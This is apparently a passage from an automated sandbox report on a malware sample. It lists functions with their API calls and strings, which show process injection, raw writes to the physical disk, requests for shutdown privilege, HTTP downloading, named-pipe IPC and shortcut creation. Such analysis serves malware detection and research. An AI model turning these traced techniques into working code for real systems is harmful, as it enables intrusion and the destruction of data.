                                                                  • String ID:
                                                                  • API String ID: 2213256293-0
                                                                  • Opcode ID: ebc95cb986f6c52362ddbad91df948eed7d41a8fa27fc4a814110a9d9c953849
                                                                  • Instruction ID: 16ca4a358659dae24186af09ba0eb44380a43b38fe8e5e876fb44ca54a814f20
                                                                  • Opcode Fuzzy Hash: ebc95cb986f6c52362ddbad91df948eed7d41a8fa27fc4a814110a9d9c953849
                                                                  • Instruction Fuzzy Hash: A851B377A10108AFDB229FE9EC88EBFB77CFB48355F504599FA09D6240D73189818B60
                                                                  Function 004053D0 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 258nativeinjectionmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 004053E7
                                                                  • OpenProcess.KERNEL32(0000047A,00000000,?), ref: 0040540E
                                                                  • NtQueryInformationProcess.NTDLL(00000000,0000001B,?,00000400,00000000), ref: 0040542F
                                                                  • CloseHandle.KERNEL32(00000000), ref: 004056C0
                                                                    • Part of subcall function 00404900: WaitForSingleObject.KERNEL32(00407495,000000FF,?,00000000,756F59EB,?,00407495), ref: 00404939
                                                                    • Part of subcall function 00404900: ReleaseMutex.KERNEL32(?,?,00407495), ref: 0040497C
                                                                  • InterlockedCompareExchange.KERNEL32(00000000,00000000), ref: 004054AB
                                                                  • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040552F
                                                                  • WriteProcessMemory.KERNEL32 ref: 0040554E
                                                                  • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 00405573
                                                                  • ReadProcessMemory.KERNEL32 ref: 004055A0
                                                                  • ReadProcessMemory.KERNEL32 ref: 004055C4
                                                                  • ReadProcessMemory.KERNEL32 ref: 004055EC
                                                                  • ReadProcessMemory.KERNEL32 ref: 00405618
                                                                    • Part of subcall function 00404160: VirtualAllocEx.KERNELBASE(?,00000000,00000000,00003000,00000040,00000000,?,?,?), ref: 00404192
                                                                    • Part of subcall function 00404160: WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0040424F
                                                                  • WriteProcessMemory.KERNEL32 ref: 004056B7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Memory$Read$InformationQueryWrite$AllocVirtual$CloseCompareExchangeHandleInterlockedMutexObjectOpenReleaseSingleThreadWait
                                                                  • String ID: STFU$zC$zC
                                                                  • API String ID: 992379172-23431524
                                                                  • Opcode ID: b939856e6fbf4f50ad2b13fa2647fb61fac06f8d783d1b4027c565cdf868c979
                                                                  • Instruction ID: df0844a3ba5e5749fd7180ba75f548f14b80aef18a41645c055a17c66c8f8887
                                                                  • Opcode Fuzzy Hash: b939856e6fbf4f50ad2b13fa2647fb61fac06f8d783d1b4027c565cdf868c979
                                                                  • Instruction Fuzzy Hash: F79173B5901209AFEB10DF94CC41FEF7778EB88704F10856AE605AB290E7759E41CF68
                                                                  Function 003653D0 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 258nativeinjectionmemoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • NtQueryInformationThread.NTDLL(?,00000000,?,0000001C,00000000), ref: 003653E7
                                                                  • OpenProcess.KERNEL32(0000047A,00000000,?), ref: 0036540E
                                                                  • NtQueryInformationProcess.NTDLL(00000000,0000001B,?,00000400,00000000), ref: 0036542F
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003656C0
                                                                    • Part of subcall function 00364900: WaitForSingleObject.KERNEL32(00367495,000000FF,?,00000000,756F59EB,?,00367495), ref: 00364939
                                                                    • Part of subcall function 00364900: ReleaseMutex.KERNEL32(?,?,00367495), ref: 0036497C
                                                                  • InterlockedCompareExchange.KERNEL32(00000000,00000000), ref: 003654AB
                                                                  • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0036552F
                                                                  • WriteProcessMemory.KERNEL32 ref: 0036554E
                                                                  • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 00365573
                                                                  • ReadProcessMemory.KERNEL32 ref: 003655A0
                                                                  • ReadProcessMemory.KERNEL32 ref: 003655C4
                                                                  • ReadProcessMemory.KERNEL32 ref: 003655EC
                                                                  • ReadProcessMemory.KERNEL32 ref: 00365618
                                                                    • Part of subcall function 00364160: VirtualAllocEx.KERNEL32(?,00000000,00000000,00003000,00000040,00000000,?,?,?), ref: 00364192
                                                                    • Part of subcall function 00364160: WriteProcessMemory.KERNEL32 ref: 0036424F
                                                                  • WriteProcessMemory.KERNEL32 ref: 003656B7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Memory$Read$InformationQueryWrite$AllocVirtual$CloseCompareExchangeHandleInterlockedMutexObjectOpenReleaseSingleThreadWait
                                                                  • String ID: STFU$z9$z9
                                                                  • API String ID: 992379172-4188904995
                                                                  • Opcode ID: b31939b989d118f630154e38c5391a898e8452d8c6b09e3eca08971324e6bc2f
                                                                  • Instruction ID: 9bc167182ce3e140ad545d3d5124f44752b8c29802b6adb94a676814882d6c75
                                                                  • Opcode Fuzzy Hash: b31939b989d118f630154e38c5391a898e8452d8c6b09e3eca08971324e6bc2f
                                                                  • Instruction Fuzzy Hash: 5F9170B5A01609AFDB11DF94CC81FEE77BCEB84700F508169E605AB284EB749E41CBA4
                                                                  Function 0040F130 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 122filestringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040F150
                                                                  • memset.MSVCRT ref: 0040F168
                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0040F17B
                                                                    • Part of subcall function 0040EDF0: memset.MSVCRT ref: 0040EE0E
                                                                    • Part of subcall function 0040EDF0: vsprintf.MSVCRT ref: 0040EE22
                                                                    • Part of subcall function 0040EDF0: PathAppendA.SHLWAPI(?,00000000), ref: 0040EE35
                                                                  • SetCurrentDirectoryA.KERNEL32(?), ref: 0040F196
                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0040F1AA
                                                                  • CoInitialize.OLE32(00000000), ref: 0040F1C2
                                                                  • _snprintf.MSVCRT ref: 0040F1E1
                                                                  • FindNextFileA.KERNEL32(?,?), ref: 0040F20C
                                                                  • strncmp.MSVCRT ref: 0040F22E
                                                                  • strstr.MSVCRT ref: 0040F246
                                                                  • _snprintf.MSVCRT ref: 0040F26B
                                                                  • FindNextFileA.KERNEL32(?,?), ref: 0040F290
                                                                  • FindClose.KERNEL32(?), ref: 0040F29E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Find$Filememset$Next_snprintf$AppendCloseCurrentDirectoryFirstInitializePathlstrcpystrncmpstrstrvsprintf
                                                                  • String ID: %s%s$.inf$RECYCLED
                                                                  • API String ID: 3870971729-188919753
                                                                  • Opcode ID: bd566a15def4f28c764169d26c68d832e88d6b2d9000b55ba9adc75dc1e1f3fb
                                                                  • Instruction ID: 063b9b5624f3e53f2b7c9015ed89a51c60917bf55f536b871253b52f4a03b6c8
                                                                  • Opcode Fuzzy Hash: bd566a15def4f28c764169d26c68d832e88d6b2d9000b55ba9adc75dc1e1f3fb
                                                                  • Instruction Fuzzy Hash: 7941A57594021CABCB20DB61DC85FEB777CEB58304F0445AAF908A2190E6B5AFC5CB64
                                                                  Function 0036F130 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 122filestringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036F150
                                                                  • memset.MSVCRT ref: 0036F168
                                                                  • lstrcpyA.KERNEL32(?,?), ref: 0036F17B
                                                                    • Part of subcall function 0036EDF0: memset.MSVCRT ref: 0036EE0E
                                                                    • Part of subcall function 0036EDF0: vsprintf.MSVCRT ref: 0036EE22
                                                                    • Part of subcall function 0036EDF0: PathAppendA.SHLWAPI(?,00000000), ref: 0036EE35
                                                                  • SetCurrentDirectoryA.KERNEL32(?), ref: 0036F196
                                                                  • FindFirstFileA.KERNEL32(?,?), ref: 0036F1AA
                                                                  • CoInitialize.OLE32(00000000), ref: 0036F1C2
                                                                  • _snprintf.MSVCRT ref: 0036F1E1
                                                                  • FindNextFileA.KERNEL32(?,?), ref: 0036F20C
                                                                  • strncmp.MSVCRT ref: 0036F22E
                                                                  • strstr.MSVCRT ref: 0036F246
                                                                  • _snprintf.MSVCRT ref: 0036F26B
                                                                  • FindNextFileA.KERNEL32(?,?), ref: 0036F290
                                                                  • FindClose.KERNEL32(?), ref: 0036F29E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Find$Filememset$Next_snprintf$AppendCloseCurrentDirectoryFirstInitializePathlstrcpystrncmpstrstrvsprintf
                                                                  • String ID: %s%s$.inf$RECYCLED
                                                                  • API String ID: 3870971729-188919753
                                                                  • Opcode ID: 7e7288f2f41a7029df25e8dec6f25fd5dd6afa16d558c9c312024b01c87ef185
                                                                  • Instruction ID: 046483317ee98d768293d9f4e58b829688ab387bf3925eaa1bb6bb150d169b95
                                                                  • Opcode Fuzzy Hash: 7e7288f2f41a7029df25e8dec6f25fd5dd6afa16d558c9c312024b01c87ef185
                                                                  • Instruction Fuzzy Hash: A94183BA94021CABCB26DB64DC85EEB737CEB54300F048598F90CA6144E674AFC5CB60
                                                                  Function 0036AA10 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 157networkstringfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036AA31
                                                                  • lstrcpyA.KERNEL32(00000000,Mozilla/4.0), ref: 0036AA45
                                                                  • InternetOpenA.WININET(00000000,?,?,?,?), ref: 0036AA60
                                                                  • lstrlenA.KERNEL32(?), ref: 0036AA78
                                                                  • InternetOpenUrlA.WININET(?,?,?,00000000,04000000,00000000), ref: 0036AA8C
                                                                  • HttpQueryInfoA.WININET(?,20000013,?,?,00000000), ref: 0036AAC0
                                                                  • InternetQueryDataAvailable.WININET(00000000,?,00000000,00000000), ref: 0036AAE2
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0036AB15
                                                                  • InternetReadFile.WININET(00000000,?,00000FF8,00000001), ref: 0036AB67
                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0036AB85
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0036ABA5
                                                                  • InternetCloseHandle.WININET(00000000), ref: 0036ABE7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$??2@OpenQuery$??3@AvailableCloseDataFileHandleHttpInfoReadlstrcpylstrlenmemset
                                                                  • String ID: Mozilla/4.0
                                                                  • API String ID: 2392773942-2634101963
                                                                  • Opcode ID: 59a30469ff1b8a69c1d33479d52b0dc1ceaef956b2935f41006aaca7caf68cbc
                                                                  • Instruction ID: ed71d7344c77238ad16aa33d4479489d6ec062e9d8c778bd7f6dbcde569ff9df
                                                                  • Opcode Fuzzy Hash: 59a30469ff1b8a69c1d33479d52b0dc1ceaef956b2935f41006aaca7caf68cbc
                                                                  • Instruction Fuzzy Hash: 86519E71A00245AFD722CF59DC84FAABBFCEB49300F04856DE909E7252D7789944CF61
                                                                  Function 0036EE40 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142stringcomCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CoCreateInstance.OLE32(00373634,00000000,00000001,00373614,?), ref: 0036EE5B
                                                                  • memset.MSVCRT ref: 0036EE81
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0036EE9A
                                                                  • lstrcatA.KERNEL32(00000000,00372C78), ref: 0036EEAE
                                                                  • lstrcatA.KERNEL32(00000000,?), ref: 0036EEBB
                                                                  • memset.MSVCRT ref: 0036EED5
                                                                  • SHGetFileInfoA.SHELL32(?,00000000,00000000,00000160,00001000), ref: 0036EEF4
                                                                  • memset.MSVCRT ref: 0036EF68
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0036EF7B
                                                                  • lstrcatA.KERNEL32(00000000,.lnk), ref: 0036EF89
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0036EFA4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcatmemset$lstrcpy$ByteCharCreateFileInfoInstanceMultiWide
                                                                  • String ID: .lnk$shell32.dll
                                                                  • API String ID: 3196525290-3399515747
                                                                  • Opcode ID: db6c8e19bf646293cd08de28edbb93c97b761b5d25908a74eea31520765f6a71
                                                                  • Instruction ID: 990005829e6998115e4d84a27ef0e59086f6ae7bfac225a48b914291dd2b1715
                                                                  • Opcode Fuzzy Hash: db6c8e19bf646293cd08de28edbb93c97b761b5d25908a74eea31520765f6a71
                                                                  • Instruction Fuzzy Hash: EE512675A40218AFDB65DB94CC85FDAB3BDAF8C700F104588F608EB290D7B5AE45CB64
                                                                  Function 0036E880 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 84pipestringthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 0036E8A0
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 0036E8AD
                                                                  • _snprintf.MSVCRT ref: 0036E8D0
                                                                  • CreateNamedPipeA.KERNEL32(00000000,00000003,00000006,000000FF,00000800,00000800,00001388,00000000), ref: 0036E8FF
                                                                  • ConnectNamedPipe.KERNEL32(00000000,00000000), ref: 0036E913
                                                                  • GetLastError.KERNEL32 ref: 0036E91D
                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0000D7A0,00000000,00000000,00000000), ref: 0036E941
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0036E94B
                                                                  • CreateNamedPipeA.KERNEL32(00000000,00000003,00000006,000000FF,00000800,00000800,00001388,00000000), ref: 0036E96E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateNamedPipe$CloseConnectErrorHandleLastThread_snprintflstrlenmemset
                                                                  • String ID: 30e44aa1$\\.\pipe\%08x_ipc
                                                                  • API String ID: 4065143564-1096776489
                                                                  • Opcode ID: d31acad39b633b431e1d10d34496e352472ea88846224be7f597e5883e3d1777
                                                                  • Instruction ID: 3cd32a5123ed202efaf8f5eafe7f4d40d98fae2e8a028a133d9cdaca75320ebf
                                                                  • Opcode Fuzzy Hash: d31acad39b633b431e1d10d34496e352472ea88846224be7f597e5883e3d1777
                                                                  • Instruction Fuzzy Hash: C82105767C03157AF33266784C87FAA765CAF14F21F648560FB08FD0C0DAF4694446A9
                                                                  Function 00405820 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 171nativesleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00405844
                                                                  • CloseHandle.KERNEL32(00000000), ref: 004058B9
                                                                  • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 004058CF
                                                                  • NtQueryInformationProcess.NTDLL(00000000,0000001B,00000000,00000800,00000000), ref: 004058FC
                                                                  • InterlockedCompareExchange.KERNEL32(00000000,00000000), ref: 00405970
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00405A05
                                                                    • Part of subcall function 004049F0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,756F59EB,?,004073CC,00437C98,00000000,00000000,00000010,00000000), ref: 00404A10
                                                                    • Part of subcall function 004049F0: ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 00404A77
                                                                  • Sleep.KERNEL32(00000001), ref: 004059F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleInformationProcessQuery$CompareExchangeInterlockedMutexObjectReleaseSingleSleepWaitmemset
                                                                  • String ID: (mA$.`@$STFU
                                                                  • API String ID: 1902471319-61987734
                                                                  • Opcode ID: bca6671e6a5d14b828f609e28b7a034000451f6025cb8f49a12631a468eaa51f
                                                                  • Instruction ID: 732b757521710307399e601c09f1fe9508d0a5d5828f33180c83336337d0604a
                                                                  • Opcode Fuzzy Hash: bca6671e6a5d14b828f609e28b7a034000451f6025cb8f49a12631a468eaa51f
                                                                  • Instruction Fuzzy Hash: 4451A3B0A40215ABDB14DFA9CC45BAF77B8EB84710F14817AF945F62C0DB789E40CBA4
                                                                  Function 00365820 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 171nativesleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00365844
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003658B9
                                                                  • NtQueryInformationProcess.NTDLL(00000000,00000000,?,00000018,00000000), ref: 003658CF
                                                                  • NtQueryInformationProcess.NTDLL(00000000,0000001B,00000000,00000800,00000000), ref: 003658FC
                                                                  • InterlockedCompareExchange.KERNEL32(00000000,00000000), ref: 00365970
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00365A05
                                                                    • Part of subcall function 003649F0: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,756F59EB,?,003673CC,00397C98,00000000,00000000,00000010,00000000), ref: 00364A10
                                                                    • Part of subcall function 003649F0: ReleaseMutex.KERNEL32(00000000,?,?,00000000), ref: 00364A77
                                                                  • Sleep.KERNEL32(00000001), ref: 003659F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CloseHandleInformationProcessQuery$CompareExchangeInterlockedMutexObjectReleaseSingleSleepWaitmemset
                                                                  • String ID: (m7$.`6$STFU
                                                                  • API String ID: 1902471319-631095445
                                                                  • Opcode ID: 4135884fef37409fd97a8a00bf0f7ff8d3bd10d3f368d99827e806ae55bec7cd
                                                                  • Instruction ID: 0f7a50d8f918aeb4a50ac4b3a10e812c7c1af9caaad87b520788980438a94397
                                                                  • Opcode Fuzzy Hash: 4135884fef37409fd97a8a00bf0f7ff8d3bd10d3f368d99827e806ae55bec7cd
                                                                  • Instruction Fuzzy Hash: 4951C571E00615ABDB25DFA8CC45BAE77F8EB84710F14C169F949EB284EB749E40CB90
                                                                  Function 00409D90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 129memoryfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004), ref: 00409DA7
                                                                  • CreateFileA.KERNEL32(\\.\PHYSICALDRIVE0,C0000000,00000003,00000000,00000003,20000080,00000000), ref: 00409DD5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: AllocCreateFileVirtual
                                                                  • String ID: \\.\PHYSICALDRIVE0
                                                                  • API String ID: 1475775534-1557481562
                                                                  • Opcode ID: ffcd8f6330cbc774a61a6af0c0f4be1ea2cb921640cac86a5a12dedcfbeb7a29
                                                                  • Instruction ID: d500eae6f82fa0b336e9878c8502f6def019f67c4d7c2b81654dcf0d8b160c7b
                                                                  • Opcode Fuzzy Hash: ffcd8f6330cbc774a61a6af0c0f4be1ea2cb921640cac86a5a12dedcfbeb7a29
                                                                  • Instruction Fuzzy Hash: D931B87278030876F62056A9AC46FEB775CD788B32F204262FB08F91D1DAB06D4486F8
                                                                  Function 00369D90 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 129memoryfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,00008000,00001000,00000004), ref: 00369DA7
                                                                  • CreateFileA.KERNEL32(\\.\PHYSICALDRIVE0,C0000000,00000003,00000000,00000003,20000080,00000000), ref: 00369DD5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: AllocCreateFileVirtual
                                                                  • String ID: \\.\PHYSICALDRIVE0
                                                                  • API String ID: 1475775534-1557481562
                                                                  • Opcode ID: 8544bddec7bbd1bf05691a612eb7f58ae6884075bc8c938427130882b6f8af4b
                                                                  • Instruction ID: ba6f11b481e78d2c9b2800576740bcc79d0d2aaa5ec40241a11d2659241b1f46
                                                                  • Opcode Fuzzy Hash: 8544bddec7bbd1bf05691a612eb7f58ae6884075bc8c938427130882b6f8af4b
                                                                  • Instruction Fuzzy Hash: 3531B8727803047AF63156ADAC47FEB775CD784B32F204262FB08E91C0DAA1694487F4
                                                                  Function 00409EC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 72fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00409EDF
                                                                  • CreateFileA.KERNEL32(\\.\PHYSICALDRIVE0,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00409F16
                                                                  • DeviceIoControl.KERNEL32(00000000,00090018,00000000,00000000,00000000,00000000,?,00000000), ref: 00409F45
                                                                  • WriteFile.KERNEL32(00000000,00000000,00000200,?,00000000), ref: 00409F5A
                                                                  • DeviceIoControl.KERNEL32(00000000,0009001C,00000000,00000000,00000000,00000000,?,00000000), ref: 00409F74
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00409F77
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ControlDeviceFile$CloseCreateHandleWritememset
                                                                  • String ID: 00100$U$\\.\PHYSICALDRIVE0
                                                                  • API String ID: 3939175881-3482488017
                                                                  • Opcode ID: d4a1ed7fe161a1ca99d4ffb7099c3cc08b8e683dc24901a62f0134f85c4f11e7
                                                                  • Instruction ID: c1763296a4acec64689325a2958d955e7f70efc6b3c63e6c8c8dbaef50afdc01
                                                                  • Opcode Fuzzy Hash: d4a1ed7fe161a1ca99d4ffb7099c3cc08b8e683dc24901a62f0134f85c4f11e7
                                                                  • Instruction Fuzzy Hash: DE11B631BC03187AF730A7649C0BFDAB66C8B59B11F100295F714BA1D1DAE42B4087A9
                                                                  Function 00369EC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 72fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • memset.MSVCRT ref: 00369EDF
                                                                  • CreateFileA.KERNEL32(\\.\PHYSICALDRIVE0,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 00369F16
                                                                  • DeviceIoControl.KERNEL32(00000000,00090018,00000000,00000000,00000000,00000000,?,00000000), ref: 00369F45
                                                                  • WriteFile.KERNEL32(00000000,00000000,00000200,?,00000000), ref: 00369F5A
                                                                  • DeviceIoControl.KERNEL32(00000000,0009001C,00000000,00000000,00000000,00000000,?,00000000), ref: 00369F74
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00369F77
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ControlDeviceFile$CloseCreateHandleWritememset
                                                                  • String ID: 00100$U$\\.\PHYSICALDRIVE0
                                                                  • API String ID: 3939175881-3482488017
                                                                  • Opcode ID: 53c87afece4fbe33683d82a1043323a21df8b336b82f9fa005b11470bf058a46
                                                                  • Instruction ID: 4c22e62fc13232181ed20a646a192a88c91a9dbbae1acf0ab315a7b964c73e9f
                                                                  • Opcode Fuzzy Hash: 53c87afece4fbe33683d82a1043323a21df8b336b82f9fa005b11470bf058a46
                                                                  • Instruction Fuzzy Hash: 8E11E732BD03187AF731E6A89C0BFDA776C8B55F11F104280F718BE1C19AE0274087A9
                                                                  Function 00403440 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 136memorynativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • printf.MSVCRT ref: 004034A0
                                                                  • printf.MSVCRT ref: 004034AD
                                                                  • printf.MSVCRT ref: 004034CC
                                                                  • NtAllocateVirtualMemory.NTDLL(00000000,?,00000000,00437A80,00003000,00000040), ref: 004034F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399327116.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_400000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: printf$AllocateMemoryVirtual
                                                                  • String ID: Done frst$block_size: %d$ngr->blocksize: %d
                                                                  • API String ID: 3635587295-1816125109
                                                                  • Opcode ID: 97c15441b68f69641c94349759af36be741f732a192bd59ec89c2944423630dc
                                                                  • Instruction ID: a515e188e62a96647e9cbe95b5ca16a3a4a6047310d6757b3ddcde311f3628c1
                                                                  • Opcode Fuzzy Hash: 97c15441b68f69641c94349759af36be741f732a192bd59ec89c2944423630dc
                                                                  • Instruction Fuzzy Hash: 0941F571A00204ABCB14DF59CC45E9A7BADEF84329F14856FF9099B391E638EE41CB94
                                                                  Function 00363440 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 136memorynativeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • printf.MSVCRT ref: 003634A0
                                                                  • printf.MSVCRT ref: 003634AD
                                                                  • printf.MSVCRT ref: 003634CC
                                                                  • NtAllocateVirtualMemory.NTDLL(00000000,?,00000000,00397A80,00003000,00000040), ref: 003634F2
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.399293670.0000000000360000.00000040.00001000.00020000.00000000.sdmp, Offset: 00360000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_360000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: printf$AllocateMemoryVirtual
                                                                  • String ID: Done frst$block_size: %d$ngr->blocksize: %d
                                                                  • API String ID: 3635587295-1816125109
                                                                  • Opcode ID: 05ca3ff0ed4bcba6f8f49bcff08588da3d11a9856301168d07a0f9e808161f77
                                                                  • Instruction ID: 8fab25400cc0c5132a58c3f167d075cc290fe7108d36398906e43025aae408bc
                                                                  • Opcode Fuzzy Hash: 05ca3ff0ed4bcba6f8f49bcff08588da3d11a9856301168d07a0f9e808161f77
                                                                  • Instruction Fuzzy Hash: D9410575A00204AFCB16DF69C846E9AB7A9EF84324F14C55DF90D8B249EB35EF01CB90
                                                                  Function 0040A550 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00403920: RtlAnsiStringToUnicodeString.NTDLL(?,?,00000000), ref: 00403962
                                                                    • Part of subcall function 00403750: LdrGetProcedureAddress.NTDLL(?,00000000,00000000,?), ref: 0040376B
                                                                  • OpenProcessToken.ADVAPI32(00000000,00000028,?,00000000,ntdll.dll,NtShutdownSystem), ref: 0040A57A
                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040A58F
